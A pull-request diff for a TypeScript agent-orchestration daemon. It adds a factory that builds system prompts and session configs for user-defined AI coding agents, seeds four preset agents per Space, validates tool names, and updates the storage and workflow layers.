### PR TITLE
feat: custom agent session init factory and SpaceAgent tools (Task 2.3)

### DIFF
--- a/packages/daemon/src/lib/space/agents/custom-agent.ts
+++ b/packages/daemon/src/lib/space/agents/custom-agent.ts
@@ -1,0 +1,452 @@
+/**
+ * Custom Agent Factory — Creates AgentSessionInit from a SpaceAgent definition
+ *
+ * Handles user-defined Space agents with configurable system prompts, tools, and models.
+ * Custom agents follow the same execution model as built-in coder/general agents but
+ * allow per-agent customization within the Space system.
+ *
+ * Role handling:
+ *   - 'coder'    → worker: standard coding tools, git workflow
+ *   - 'general'  → worker: same as coder, broader scope
+ *   - 'planner'  → orchestrator (reserved); treated as worker for now
+ *   - 'reviewer' → worker with review-specific instructions in the system prompt
+ *
+ * Reviewer context can also be indicated via task.taskType === 'review'.
+ */
+
+import type { AgentSessionInit } from '../../agent/agent-session';
+import type {
+	SpaceAgent,
+	SpaceTask,
+	SpaceWorkflowRun,
+	Space,
+	SessionFeatures,
+	AgentDefinition,
+} from '@neokai/shared';
+import type { SpaceAgentManager } from '../managers/space-agent-manager';
+
+const DEFAULT_CUSTOM_AGENT_MODEL = 'claude-sonnet-4-5-20250929';
+
+const CUSTOM_AGENT_FEATURES: SessionFeatures = {
+	rewind: false,
+	worktree: false,
+	coordinator: false,
+	archive: false,
+	sessionInfo: false,
+};
+
+// ============================================================================
+// Config
+// ============================================================================
+
+export interface CustomAgentConfig {
+	/** The custom Space agent definition */
+	customAgent: SpaceAgent;
+	/** The task being executed */
+	task: SpaceTask;
+	/** The workflow run context (null when running outside a workflow) */
+	workflowRun: SpaceWorkflowRun | null;
+	/** The Space this agent belongs to */
+	space: Space;
+	/** Session ID for the new session */
+	sessionId: string;
+	/** Workspace path (typically space.workspacePath) */
+	workspacePath: string;
+	/** Summaries of previously completed tasks for context */
+	previousTaskSummaries?: string[];
+}
+
+// ============================================================================
+// System prompt builder
+// ============================================================================
+
+/**
+ * Build the behavioral system prompt for a custom agent.
+ *
+ * Structure:
+ *   1. Role identification (agent name + role label)
+ *   2. Custom system prompt from SpaceAgent.systemPrompt (if provided)
+ *   3. Reviewer-specific instructions (if role is 'reviewer')
+ *   4. Mandatory git workflow instructions
+ *   5. Bypass markers for research-only tasks
+ *   6. Review feedback handling section
+ */
+export function buildCustomAgentSystemPrompt(customAgent: SpaceAgent): string {
+	const sections: string[] = [];
+
+	const roleLabel = getRoleLabel(customAgent.role);
+
+	sections.push(
+		`You are ${customAgent.name}, a ${roleLabel} Agent working on a specific task within a workflow.`
+	);
+	sections.push(`Your job is to complete the task described below to the best of your ability.`);
+	sections.push(`Work carefully and thoroughly. When you are done, simply finish your response.`);
+
+	// Custom instructions from the agent definition
+	if (customAgent.systemPrompt) {
+		sections.push(`\n## Agent Instructions\n`);
+		sections.push(customAgent.systemPrompt);
+	}
+
+	// Reviewer-specific instructions (for agents with role 'reviewer')
+	if (customAgent.role === 'reviewer') {
+		sections.push(`\n## Review Responsibilities\n`);
+		sections.push(
+			`As a Reviewer Agent, your primary job is to evaluate the quality of completed work:`
+		);
+		sections.push(
+			`- **Review code changes**: Examine the implementation for correctness, style, and completeness`
+		);
+		sections.push(`- **Verify tests**: Check that tests cover the new behavior and pass`);
+		sections.push(`- **Check PR description**: Ensure the PR clearly describes what was done`);
+		sections.push(`- **Provide actionable feedback**: Be specific about what needs to change`);
+		sections.push(`- **Approve or request changes**: Conclude with a clear verdict`);
+		sections.push(``);
+		sections.push(
+			`You are a specialized Worker — NOT a Leader replacement. ` +
+				`You do NOT orchestrate other agents or manage task assignment.`
+		);
+	}
+
+	// Mandatory Git workflow
+	sections.push(`\n## Git Workflow (MANDATORY)\n`);
+	sections.push(
+		`You are working in an isolated git worktree on a feature branch. ` +
+			`The branch has already been created for you. Follow this workflow:`
+	);
+	sections.push(
+		`1. **Sync with the default branch first** — run all three lines as a **single bash invocation** (variables persist within one call):\n` +
+			`   \`\`\`bash\n` +
+			`   DEFAULT_BRANCH=$(git symbolic-ref refs/remotes/origin/HEAD 2>/dev/null | sed 's@^refs/remotes/origin/@@')\n` +
+			`   [ -z "$DEFAULT_BRANCH" ] && DEFAULT_BRANCH=$(git remote show origin | sed -n '/HEAD branch/s/.*: //p')\n` +
+			`   git fetch origin && git rebase origin/$DEFAULT_BRANCH\n` +
+			`   \`\`\`\n` +
+			`   **If the rebase fails with conflicts, stop immediately and report the error** — do NOT continue on a stale base`
+	);
+	sections.push(`2. Implement the task, making logical commits along the way`);
+	sections.push(`3. Add or update tests to cover the new/changed behavior — tests are mandatory`);
+	sections.push(`4. Push your branch: \`git push -u origin HEAD\``);
+	sections.push(
+		`5. Ensure a pull request exists — check first to avoid creating a duplicate:\n` +
+			`   \`\`\`bash\n` +
+			`   EXISTING_PR=$(gh pr list --head "$(git rev-parse --abbrev-ref HEAD)" --state open --json url --jq '.[0].url // empty' 2>/dev/null)\n` +
+			`   if [ -z "$EXISTING_PR" ]; then\n` +
+			`     gh pr create --fill --base $(b=$(git symbolic-ref refs/remotes/origin/HEAD 2>/dev/null | sed 's@^refs/remotes/origin/@@'); [ -z "$b" ] && b=$(git remote show origin | sed -n '/HEAD branch/s/.*: //p'); echo "$b")\n` +
+			`   else\n` +
+			`     echo "PR already exists: $EXISTING_PR (updated with latest push)"\n` +
+			`   fi\n` +
+			`   \`\`\``
+	);
+	sections.push(`6. Finish your response`);
+	sections.push(``);
+	sections.push(
+		`**IMPORTANT**: Do NOT commit directly to the main/dev/master branch. ` +
+			`The runtime enforces this — you will be sent back if no feature branch and PR exist.`
+	);
+
+	// Bypass markers for research/verification tasks
+	sections.push(`\n## Bypassing Git/PR Gates for Research-Only Tasks\n`);
+	sections.push(
+		`For **research-only**, **verification-only**, or **investigation-only** tasks that do NOT modify any files, ` +
+			`you can bypass the git/PR requirements by starting your final output with one of these markers:`
+	);
+	sections.push(
+		`- \`RESEARCH_ONLY:\` — For pure research tasks (e.g., "Analyze and document X")\n` +
+			`- \`VERIFICATION_COMPLETE:\` — For verification tasks (e.g., "Verify Y is correct")\n` +
+			`- \`INVESTIGATION_RESULT:\` — For investigation tasks (e.g., "Investigate why Z fails")\n` +
+			`- \`ANALYSIS_COMPLETE:\` — For analysis tasks (e.g., "Analyze performance")`
+	);
+	sections.push(
+		`**Example**:\n` +
+			`\`\`\`\n` +
+			`VERIFICATION_COMPLETE:\n\n` +
+			`I have verified that the authentication system is correctly implemented:\n` +
+			`1. JWT tokens are properly generated with correct expiry\n` +
+			`2. Refresh token flow works as expected\n\n` +
+			`No code changes are needed.\n` +
+			`\`\`\``
+	);
+	sections.push(
+		`**Important**: Only use bypass markers when the task genuinely requires NO code changes. ` +
+			`If you need to modify any files, follow the normal git/PR workflow instead.`
+	);
+
+	// Review feedback handling
+	sections.push(`\n## Addressing Review Feedback\n`);
+	sections.push(
+		`When you receive feedback containing GitHub review URLs, fetch each review by its ID:`
+	);
+	sections.push(
+		`1. Extract the review ID from the URL (e.g. \`#pullrequestreview-3900806436\` → ID is \`3900806436\`)`
+	);
+	sections.push(
+		`2. Fetch each review: \`GH_PAGER=cat gh api repos/{owner}/{repo}/pulls/{pr}/reviews/{review_id} --jq '.body'\``
+	);
+	sections.push(`3. Read the review body to understand what changes are requested`);
+	sections.push(`4. Verify the feedback item by item — address the ones that are true or helpful`);
+	sections.push(`5. Add or update tests if the review calls for it`);
+	sections.push(`6. Push your changes: \`git push\``);
+	sections.push(
+		`7. Finish your response — the leader will re-dispatch reviewers for the next round`
+	);
+
+	return sections.join('\n');
+}
+
+// ============================================================================
+// Task message builder
+// ============================================================================
+
+/**
+ * Build the initial user message for a custom agent session.
+ *
+ * Contains task-specific context: task title/description, workflow run context,
+ * space background/instructions, review-specific guidance (if applicable),
+ * and previous task summaries.
+ */
+export function buildCustomAgentTaskMessage(config: CustomAgentConfig): string {
+	const { task, workflowRun, space, previousTaskSummaries, customAgent } = config;
+
+	const sections: string[] = [];
+
+	// Task context
+	sections.push(`## Task\n`);
+	sections.push(`**Title:** ${task.title}`);
+	sections.push(`**Description:** ${task.description}`);
+	if (task.priority) {
+		sections.push(`**Priority:** ${task.priority}`);
+	}
+	if (task.taskType) {
+		sections.push(`**Type:** ${task.taskType}`);
+	}
+
+	// Review-specific instructions (when task is a review or agent is a reviewer)
+	if (task.taskType === 'review' || customAgent.role === 'reviewer') {
+		sections.push(`\n## Review Instructions\n`);
+		sections.push(`This task requires reviewing work that has been completed.`);
+		sections.push(`Focus on:`);
+		sections.push(`- Correctness of the implementation`);
+		sections.push(`- Test coverage and test quality`);
+		sections.push(`- Code style and maintainability`);
+		sections.push(`- PR description completeness`);
+		sections.push(``);
+		sections.push(
+			`Conclude your review with a clear verdict: **Approved** or **Changes Requested**, ` +
+				`with specific actionable feedback for any requested changes.`
+		);
+	}
+
+	// Workflow run context
+	if (workflowRun) {
+		sections.push(`\n## Workflow Context\n`);
+		sections.push(`**Workflow Run:** ${workflowRun.title}`);
+		if (workflowRun.description) {
+			sections.push(`**Description:** ${workflowRun.description}`);
+		}
+	}
+
+	// Space context
+	if (space.backgroundContext) {
+		sections.push(`\n## Project Context\n`);
+		sections.push(space.backgroundContext);
+	}
+	if (space.instructions) {
+		sections.push(`\n## Instructions\n`);
+		sections.push(space.instructions);
+	}
+
+	// Existing PR context
+	if (task.prUrl) {
+		sections.push(`\n## Existing Pull Request\n`);
+		sections.push(`This task already has an existing pull request: ${task.prUrl}`);
+		sections.push(`Push your changes to update this PR — do NOT create a new one.`);
+	}
+
+	// Previous task summaries
+	if (previousTaskSummaries && previousTaskSummaries.length > 0) {
+		sections.push(`\n## Previous Work on This Goal\n`);
+		sections.push(`The following tasks have already been completed:`);
+		for (const summary of previousTaskSummaries) {
+			sections.push(`- ${summary}`);
+		}
+	}
+
+	sections.push(`\nBegin working on this task.`);
+
+	return sections.join('\n');
+}
+
+// ============================================================================
+// Session init factory
+// ============================================================================
+
+/**
+ * Create an AgentSessionInit for a custom Space agent session.
+ *
+ * Tool handling:
+ *   - When SpaceAgent.tools is set (non-empty): uses the `agent`/`agents` pattern
+ *     so the SDK enforces the agent's tool allowlist.
+ *   - When SpaceAgent.tools is unset: uses the simple `claude_code` preset path,
+ *     giving the agent access to all standard Claude Code tools.
+ *
+ * Model resolution: SpaceAgent.model → Space.defaultModel → hardcoded default.
+ */
+export function createCustomAgentInit(config: CustomAgentConfig): AgentSessionInit {
+	const { customAgent, space, sessionId, workspacePath } = config;
+
+	const customTools =
+		customAgent.tools && customAgent.tools.length > 0 ? customAgent.tools : undefined;
+
+	const model = customAgent.model ?? space.defaultModel ?? DEFAULT_CUSTOM_AGENT_MODEL;
+
+	const behavioralPrompt = buildCustomAgentSystemPrompt(customAgent);
+
+	// When custom tools are configured, use the agent/agents pattern so the SDK
+	// enforces the allowlist. Otherwise, fall back to the simple preset path.
+	if (customTools) {
+		const agentKey = sanitizeAgentKey(customAgent.name);
+		const agentDef: AgentDefinition = {
+			description:
+				customAgent.description ??
+				`Custom ${getRoleLabel(customAgent.role)} agent: ${customAgent.name}`,
+			tools: customTools,
+			model: 'inherit',
+			prompt: behavioralPrompt,
+		};
+
+		return {
+			sessionId,
+			workspacePath,
+			systemPrompt: {
+				type: 'preset',
+				preset: 'claude_code',
+			},
+			features: CUSTOM_AGENT_FEATURES,
+			context: { spaceId: space.id },
+			type: 'worker',
+			model,
+			agent: agentKey,
+			agents: { [agentKey]: agentDef },
+			contextAutoQueue: false,
+		};
+	}
+
+	// Simple path: all claude_code tools available, prompt appended to preset
+	return {
+		sessionId,
+		workspacePath,
+		systemPrompt: {
+			type: 'preset',
+			preset: 'claude_code',
+			append: behavioralPrompt,
+		},
+		features: CUSTOM_AGENT_FEATURES,
+		context: { spaceId: space.id },
+		type: 'worker',
+		model,
+		contextAutoQueue: false,
+	};
+}
+
+// ============================================================================
+// Resolution helper (for SpaceRuntime — M4)
+// ============================================================================
+
+export interface ResolveAgentInitConfig {
+	/** The task to execute */
+	task: SpaceTask;
+	/** The Space this task belongs to */
+	space: Space;
+	/** Agent manager for resolving custom agents */
+	agentManager: SpaceAgentManager;
+	/** Session ID for the new session */
+	sessionId: string;
+	/** Workspace path */
+	workspacePath: string;
+	/** Workflow run context (null when outside a workflow) */
+	workflowRun?: SpaceWorkflowRun | null;
+	/** Summaries of previously completed tasks */
+	previousTaskSummaries?: string[];
+}
+
+/**
+ * Resolve the correct AgentSessionInit for a Space task.
+ *
+ * - If `task.customAgentId` is set: resolve the custom SpaceAgent and build
+ *   a session init via `createCustomAgentInit()`.
+ * - Otherwise: delegate to built-in agent factories (not yet implemented — M4).
+ *
+ * This helper is the single dispatch point for task-to-agent resolution in
+ * SpaceRuntime (M4). It ensures custom agents take precedence over built-ins
+ * when a custom agent is assigned.
+ *
+ * @throws {Error} When `task.customAgentId` references a non-existent agent.
+ * @throws {Error} When `task.customAgentId` is unset and built-in factories
+ *   have not yet been implemented (M4 work).
+ */
+export function resolveAgentInit(config: ResolveAgentInitConfig): AgentSessionInit {
+	const {
+		task,
+		space,
+		agentManager,
+		sessionId,
+		workspacePath,
+		workflowRun,
+		previousTaskSummaries,
+	} = config;
+
+	if (task.customAgentId) {
+		const customAgent = agentManager.getById(task.customAgentId);
+		if (!customAgent) {
+			throw new Error(`Custom agent not found: ${task.customAgentId} (task: ${task.id})`);
+		}
+
+		return createCustomAgentInit({
+			customAgent,
+			task,
+			workflowRun: workflowRun ?? null,
+			space,
+			sessionId,
+			workspacePath,
+			previousTaskSummaries,
+		});
+	}
+
+	// Built-in agent factories for Space tasks are implemented in M4.
+	// For now, throw a descriptive error to avoid silent failures.
+	throw new Error(
+		`Built-in Space agent factories are not yet implemented (M4). ` +
+			`Task "${task.id}" has no customAgentId — assign a custom agent or wait for M4.`
+	);
+}
+
+// ============================================================================
+// Helpers
+// ============================================================================
+
+/**
+ * Sanitize an agent name into a valid SDK agent key.
+ * Keys must be alphanumeric + hyphens, max 40 chars.
+ */
+function sanitizeAgentKey(name: string): string {
+	return (
+		name
+			.toLowerCase()
+			.replace(/[^a-z0-9]+/g, '-')
+			.replace(/^-+|-+$/g, '')
+			.slice(0, 40) || 'custom-agent'
+	);
+}
+
+function getRoleLabel(role: SpaceAgent['role']): string {
+	switch (role) {
+		case 'coder':
+			return 'Coder';
+		case 'general':
+			return 'General';
+		case 'planner':
+			return 'Planner';
+		case 'reviewer':
+			return 'Reviewer';
+	}
+}

--- a/packages/daemon/src/lib/space/agents/custom-agent.ts
+++ b/packages/daemon/src/lib/space/agents/custom-agent.ts
@@ -375,19 +375,16 @@ export interface ResolveAgentInitConfig {
 }
 
 /**
- * Resolve the correct AgentSessionInit for a Space task.
+ * Resolve the AgentSessionInit for a Space task by loading the assigned SpaceAgent.
  *
- * - If `task.customAgentId` is set: resolve the custom SpaceAgent and build
- *   a session init via `createCustomAgentInit()`.
- * - Otherwise: delegate to built-in agent factories (not yet implemented — M4).
+ * All agents — including the seeded preset agents (coder, general, planner, reviewer)
+ * — are regular `SpaceAgent` records resolved by ID. There is no separate builtin
+ * code path: every task must have a `customAgentId` that points to an agent row in
+ * the Space's agent table. SpaceRuntime is responsible for ensuring this is set
+ * (e.g. by seeding preset agents at Space creation and assigning one to each task).
  *
- * This helper is the single dispatch point for task-to-agent resolution in
- * SpaceRuntime (M4). It ensures custom agents take precedence over built-ins
- * when a custom agent is assigned.
- *
+ * @throws {Error} When `task.customAgentId` is unset — the task must have an agent.
  * @throws {Error} When `task.customAgentId` references a non-existent agent.
- * @throws {Error} When `task.customAgentId` is unset and built-in factories
- *   have not yet been implemented (M4 work).
  */
 export function resolveAgentInit(config: ResolveAgentInitConfig): AgentSessionInit {
 	const {
@@ -400,29 +397,26 @@ export function resolveAgentInit(config: ResolveAgentInitConfig): AgentSessionIn
 		previousTaskSummaries,
 	} = config;
 
-	if (task.customAgentId) {
-		const customAgent = agentManager.getById(task.customAgentId);
-		if (!customAgent) {
-			throw new Error(`Custom agent not found: ${task.customAgentId} (task: ${task.id})`);
-		}
-
-		return createCustomAgentInit({
-			customAgent,
-			task,
-			workflowRun: workflowRun ?? null,
-			space,
-			sessionId,
-			workspacePath,
-			previousTaskSummaries,
-		});
+	if (!task.customAgentId) {
+		throw new Error(
+			`Task "${task.id}" has no agentId — assign a SpaceAgent to the task before calling resolveAgentInit()`
+		);
 	}
 
-	// Built-in agent factories for Space tasks are implemented in M4.
-	// For now, throw a descriptive error to avoid silent failures.
-	throw new Error(
-		`Built-in Space agent factories are not yet implemented (M4). ` +
-			`Task "${task.id}" has no customAgentId — assign a custom agent or wait for M4.`
-	);
+	const agent = agentManager.getById(task.customAgentId);
+	if (!agent) {
+		throw new Error(`Agent not found: ${task.customAgentId} (task: ${task.id})`);
+	}
+
+	return createCustomAgentInit({
+		customAgent: agent,
+		task,
+		workflowRun: workflowRun ?? null,
+		space,
+		sessionId,
+		workspacePath,
+		previousTaskSummaries,
+	});
 }
 
 // ============================================================================

--- a/packages/daemon/src/lib/space/agents/custom-agent.ts
+++ b/packages/daemon/src/lib/space/agents/custom-agent.ts
@@ -290,6 +290,11 @@ export function buildCustomAgentTaskMessage(config: CustomAgentConfig): string {
  *     giving the agent access to all standard Claude Code tools.
  *
  * Model resolution: SpaceAgent.model → Space.defaultModel → hardcoded default.
+ *
+ * NOTE: The task message (context delivered as the first user turn) is NOT embedded
+ * here. SpaceRuntime (M4) must call `buildCustomAgentTaskMessage(config)` separately
+ * and inject it via `injectMessage()` after the session is created — this mirrors the
+ * room-runtime pattern where the initial user message is sent after session start.
  */
 export function createCustomAgentInit(config: CustomAgentConfig): AgentSessionInit {
 	const { customAgent, space, sessionId, workspacePath } = config;
@@ -427,6 +432,13 @@ export function resolveAgentInit(config: ResolveAgentInitConfig): AgentSessionIn
 /**
  * Sanitize an agent name into a valid SDK agent key.
  * Keys must be alphanumeric + hyphens, max 40 chars.
+ *
+ * Collision note: two different agent names that normalize to the same key (e.g.
+ * "My Agent" and "my-agent") would conflict here. In practice this cannot happen
+ * because `SpaceAgentManager` enforces case-insensitive name uniqueness within a
+ * Space at the DB level — any two agents in the same Space have distinct names, and
+ * the normalized keys derived from those names are therefore distinct within a single
+ * `createCustomAgentInit` call (which is always for one agent at a time).
  */
 function sanitizeAgentKey(name: string): string {
 	return (

--- a/packages/daemon/src/lib/space/agents/seed-agents.ts
+++ b/packages/daemon/src/lib/space/agents/seed-agents.ts
@@ -1,0 +1,126 @@
+/**
+ * Space Preset Agent Seeding
+ *
+ * Seeds the four default SpaceAgent records when a new Space is created.
+ * Preset agents are regular SpaceAgent rows — fully editable by users — that
+ * happen to have a well-known role label and sensible defaults for system
+ * prompt, tools, and model. SpaceRuntime resolves all agents by ID at
+ * runtime; there is no special builtin code path.
+ *
+ * Preset agents seeded per Space:
+ *   - Coder    (role: 'coder')    — implementation worker
+ *   - General  (role: 'general')  — general-purpose worker
+ *   - Planner  (role: 'planner')  — planning/orchestration worker
+ *   - Reviewer (role: 'reviewer') — code review specialist
+ */
+
+import type { SpaceAgent } from '@neokai/shared';
+import { KNOWN_TOOLS } from '@neokai/shared';
+import type { SpaceAgentManager, SpaceAgentResult } from '../managers/space-agent-manager';
+
+// ---------------------------------------------------------------------------
+// Tool defaults per role
+// ---------------------------------------------------------------------------
+
+/** Full coding toolset: read, write, shell, search, web */
+const CODER_TOOLS = KNOWN_TOOLS.filter(
+	(t) => !['Task', 'TaskOutput', 'TaskStop'].includes(t)
+) as string[];
+
+/** Same as coder — general agents have the same toolset */
+const GENERAL_TOOLS = CODER_TOOLS;
+
+/** Planner uses the same toolset as coder (orchestration patterns reserved for future) */
+const PLANNER_TOOLS = CODER_TOOLS;
+
+/** Reviewers read and run tests — no file write/edit by default */
+const REVIEWER_TOOLS: string[] = ['Read', 'Bash', 'Grep', 'Glob', 'WebFetch', 'WebSearch'];
+
+// ---------------------------------------------------------------------------
+// Preset definitions
+// ---------------------------------------------------------------------------
+
+interface PresetDefinition {
+	name: string;
+	role: SpaceAgent['role'];
+	description: string;
+	tools: string[];
+}
+
+const PRESET_AGENTS: PresetDefinition[] = [
+	{
+		name: 'Coder',
+		role: 'coder',
+		description:
+			'Implementation worker. Writes code, runs tests, commits changes, and opens pull requests.',
+		tools: CODER_TOOLS,
+	},
+	{
+		name: 'General',
+		role: 'general',
+		description: 'General-purpose worker. Handles broad tasks that do not fit a specialized role.',
+		tools: GENERAL_TOOLS,
+	},
+	{
+		name: 'Planner',
+		role: 'planner',
+		description:
+			'Planning agent. Breaks down goals into actionable tasks and drafts implementation plans.',
+		tools: PLANNER_TOOLS,
+	},
+	{
+		name: 'Reviewer',
+		role: 'reviewer',
+		description:
+			'Code review specialist. Reviews pull requests for correctness, style, and test coverage.',
+		tools: REVIEWER_TOOLS,
+	},
+];
+
+// ---------------------------------------------------------------------------
+// Public API
+// ---------------------------------------------------------------------------
+
+export interface SeedPresetAgentsResult {
+	/** Agents that were successfully created */
+	seeded: SpaceAgent[];
+	/** Errors for agents that failed to seed (e.g. name already taken) */
+	errors: Array<{ name: string; error: string }>;
+}
+
+/**
+ * Seed the four preset SpaceAgents for a newly-created Space.
+ *
+ * Idempotent by design: if a preset name is already taken in this Space
+ * (e.g. because this was called twice), the error is recorded but does not
+ * abort the remaining seeds.
+ *
+ * @param spaceId - The Space to seed agents into
+ * @param agentManager - The SpaceAgentManager to use for creation
+ * @returns Summary of seeded agents and any errors
+ */
+export async function seedPresetAgents(
+	spaceId: string,
+	agentManager: SpaceAgentManager
+): Promise<SeedPresetAgentsResult> {
+	const seeded: SpaceAgent[] = [];
+	const errors: Array<{ name: string; error: string }> = [];
+
+	for (const preset of PRESET_AGENTS) {
+		const result: SpaceAgentResult<SpaceAgent> = await agentManager.create({
+			spaceId,
+			name: preset.name,
+			role: preset.role,
+			description: preset.description,
+			tools: preset.tools,
+		});
+
+		if (result.ok) {
+			seeded.push(result.value);
+		} else {
+			errors.push({ name: preset.name, error: result.error });
+		}
+	}
+
+	return { seeded, errors };
+}

--- a/packages/daemon/src/lib/space/managers/space-agent-manager.ts
+++ b/packages/daemon/src/lib/space/managers/space-agent-manager.ts
@@ -6,12 +6,16 @@
  *   - Name uniqueness within a Space (DB-level check via LOWER())
  *   - Model must be recognized; when a provider is also given, validation is
  *     scoped to that provider via the provider-aware isValidModel() API
+ *   - Tool names must be from KNOWN_TOOLS (validated on create and non-null update)
  *   - Deletion blocked when agent is referenced by workflow steps
  */
 
 import type { SpaceAgent, CreateSpaceAgentParams, UpdateSpaceAgentParams } from '@neokai/shared';
+import { KNOWN_TOOLS } from '@neokai/shared';
 import type { SpaceAgentRepository } from '../../../storage/repositories/space-agent-repository';
 import { isValidModel, getAvailableModels, getModelInfoUnfiltered } from '../../model-service';
+
+const KNOWN_TOOLS_SET = new Set<string>(KNOWN_TOOLS);
 
 export type SpaceAgentResult<T> =
 	| { ok: true; value: T }
@@ -30,6 +34,12 @@ export class SpaceAgentManager {
 				ok: false,
 				error: `An agent named "${params.name}" already exists in this Space`,
 			};
+		}
+
+		// Validate tool names against KNOWN_TOOLS
+		if (params.tools) {
+			const toolError = validateTools(params.tools);
+			if (toolError) return { ok: false, error: toolError };
 		}
 
 		// Validate model (provider-aware when provider is supplied)
@@ -57,6 +67,13 @@ export class SpaceAgentManager {
 					error: `An agent named "${params.name}" already exists in this Space`,
 				};
 			}
+		}
+
+		// Validate tool names against KNOWN_TOOLS (only when setting to a non-null value;
+		// null means clearing the override which is always valid)
+		if (params.tools) {
+			const toolError = validateTools(params.tools);
+			if (toolError) return { ok: false, error: toolError };
 		}
 
 		// Validate model if being set to a non-null value.
@@ -145,4 +162,18 @@ export class SpaceAgentManager {
 		const info = await getModelInfoUnfiltered(model, 'global');
 		return info ? null : `Unrecognized model: "${model}"`;
 	}
+}
+
+// ---------------------------------------------------------------------------
+// Module-level helpers
+// ---------------------------------------------------------------------------
+
+/**
+ * Validate that all tool names in the array are in KNOWN_TOOLS.
+ * Returns a descriptive error string on failure, or null if all names are valid.
+ */
+function validateTools(tools: string[]): string | null {
+	const invalid = tools.filter((t) => !KNOWN_TOOLS_SET.has(t));
+	if (invalid.length === 0) return null;
+	return `Unknown tool${invalid.length > 1 ? 's' : ''}: ${invalid.map((t) => `"${t}"`).join(', ')}. Valid tools: ${KNOWN_TOOLS.join(', ')}`;
 }

--- a/packages/daemon/src/lib/space/managers/space-workflow-manager.ts
+++ b/packages/daemon/src/lib/space/managers/space-workflow-manager.ts
@@ -18,19 +18,12 @@ import type {
 	WorkflowStepInput,
 	CreateSpaceWorkflowParams,
 	UpdateSpaceWorkflowParams,
-	BuiltinAgentRole,
 } from '@neokai/shared';
 import type { SpaceWorkflowRepository } from '../../../storage/repositories/space-workflow-repository';
 
 // ---------------------------------------------------------------------------
 // Constants
 // ---------------------------------------------------------------------------
-
-/**
- * Valid builtin agent roles for workflow steps.
- * NOTE: 'leader' is intentionally excluded — it is always implicit in SpaceRuntime.
- */
-const VALID_BUILTIN_ROLES: ReadonlySet<BuiltinAgentRole> = new Set(['planner', 'coder', 'general']);
 
 /**
  * Allowlisted command prefixes for quality_check gates.
@@ -147,26 +140,15 @@ export class SpaceWorkflowManager {
 		}
 		if (params.steps !== undefined) {
 			// UpdateSpaceWorkflowParams uses WorkflowStep[] (with id/order) — treat as inputs
-			const inputs: WorkflowStepInput[] = (params.steps ?? []).map((s): WorkflowStepInput => {
-				if (s.agentRefType === 'custom') {
-					return {
-						name: s.name,
-						agentRefType: 'custom',
-						agentRef: s.agentRef,
-						entryGate: s.entryGate,
-						exitGate: s.exitGate,
-						instructions: s.instructions,
-					};
-				}
-				return {
+			const inputs: WorkflowStepInput[] = (params.steps ?? []).map(
+				(s): WorkflowStepInput => ({
 					name: s.name,
-					agentRefType: 'builtin',
-					agentRef: s.agentRef,
+					agentId: s.agentId,
 					entryGate: s.entryGate,
 					exitGate: s.exitGate,
 					instructions: s.instructions,
-				};
-			});
+				})
+			);
 			this.validateSteps(existing.spaceId, inputs);
 		}
 
@@ -228,28 +210,17 @@ export class SpaceWorkflowManager {
 	}
 
 	private validateStepAgentRef(spaceId: string, step: WorkflowStepInput, index: number): void {
-		if (step.agentRefType === 'builtin') {
-			if (!VALID_BUILTIN_ROLES.has(step.agentRef as BuiltinAgentRole)) {
+		if (!step.agentId || !step.agentId.trim()) {
+			throw new WorkflowValidationError(
+				`step[${index}]: agentId must be a non-empty SpaceAgent UUID`
+			);
+		}
+		if (this.agentLookup) {
+			const agent = this.agentLookup.getAgentById(spaceId, step.agentId);
+			if (!agent) {
 				throw new WorkflowValidationError(
-					`step[${index}]: invalid builtin agentRef "${step.agentRef}". ` +
-						`Must be one of: ${[...VALID_BUILTIN_ROLES].join(', ')}. ` +
-						`Note: 'leader' is not a valid workflow step agent.`
+					`step[${index}]: agentId "${step.agentId}" does not match any SpaceAgent in this space`
 				);
-			}
-		} else {
-			// custom ref — validate that a SpaceAgent with this UUID exists
-			if (!step.agentRef || !step.agentRef.trim()) {
-				throw new WorkflowValidationError(
-					`step[${index}]: custom agentRef must be a non-empty SpaceAgent UUID`
-				);
-			}
-			if (this.agentLookup) {
-				const agent = this.agentLookup.getAgentById(spaceId, step.agentRef);
-				if (!agent) {
-					throw new WorkflowValidationError(
-						`step[${index}]: custom agentRef "${step.agentRef}" does not match any SpaceAgent ID in this space`
-					);
-				}
 			}
 		}
 	}

--- a/packages/daemon/src/storage/repositories/space-agent-repository.ts
+++ b/packages/daemon/src/storage/repositories/space-agent-repository.ts
@@ -4,9 +4,10 @@
  * CRUD operations for space_agents table.
  *
  * Column mapping:
+ *   SpaceAgent.tools        ↔  tools column (JSON string array; '[]' or null → undefined)
  *   SpaceAgent.toolConfig   ↔  config column (JSON)
  *   SpaceAgent.systemPrompt ↔  system_prompt column
- *   SpaceAgent.role         ↔  role column (BuiltinAgentRole: 'planner'|'coder'|'general')
+ *   SpaceAgent.role         ↔  role column (BuiltinAgentRole: 'planner'|'coder'|'general'|'reviewer')
  */
 
 import type { Database as BunDatabase } from 'bun:sqlite';
@@ -37,7 +38,7 @@ export class SpaceAgentRepository {
 				params.description ?? '', // NOT NULL DEFAULT '' in Mig29 — never pass null
 				params.model ?? null,
 				params.provider ?? null,
-				'[]', // tools column kept for DB compatibility, unused in type layer
+				params.tools && params.tools.length > 0 ? JSON.stringify(params.tools) : '[]',
 				params.systemPrompt ?? '', // NOT NULL DEFAULT '' in Mig29 — never pass null
 				params.role,
 				params.toolConfig ? JSON.stringify(params.toolConfig) : null,
@@ -131,6 +132,10 @@ export class SpaceAgentRepository {
 			fields.push('role = ?');
 			values.push(params.role);
 		}
+		if (params.tools !== undefined) {
+			fields.push('tools = ?');
+			values.push(params.tools && params.tools.length > 0 ? JSON.stringify(params.tools) : '[]');
+		}
 		if (params.toolConfig !== undefined) {
 			fields.push('config = ?');
 			values.push(params.toolConfig ? JSON.stringify(params.toolConfig) : null);
@@ -173,6 +178,13 @@ export class SpaceAgentRepository {
 	}
 
 	private rowToAgent(row: Record<string, unknown>): SpaceAgent {
+		// Parse tools: '[]' or null → undefined; non-empty JSON array → string[]
+		let tools: string[] | undefined;
+		if (row.tools) {
+			const parsed = JSON.parse(row.tools as string) as string[];
+			tools = parsed.length > 0 ? parsed : undefined;
+		}
+
 		return {
 			id: row.id as string,
 			spaceId: row.space_id as string,
@@ -182,6 +194,7 @@ export class SpaceAgentRepository {
 			provider: (row.provider as string | null) ?? undefined,
 			systemPrompt: (row.system_prompt as string) || undefined, // '' or null → undefined
 			role: (row.role as SpaceAgent['role'] | null) ?? 'coder',
+			tools,
 			toolConfig: row.config
 				? (JSON.parse(row.config as string) as Record<string, unknown>)
 				: undefined,

--- a/packages/daemon/src/storage/repositories/space-workflow-repository.ts
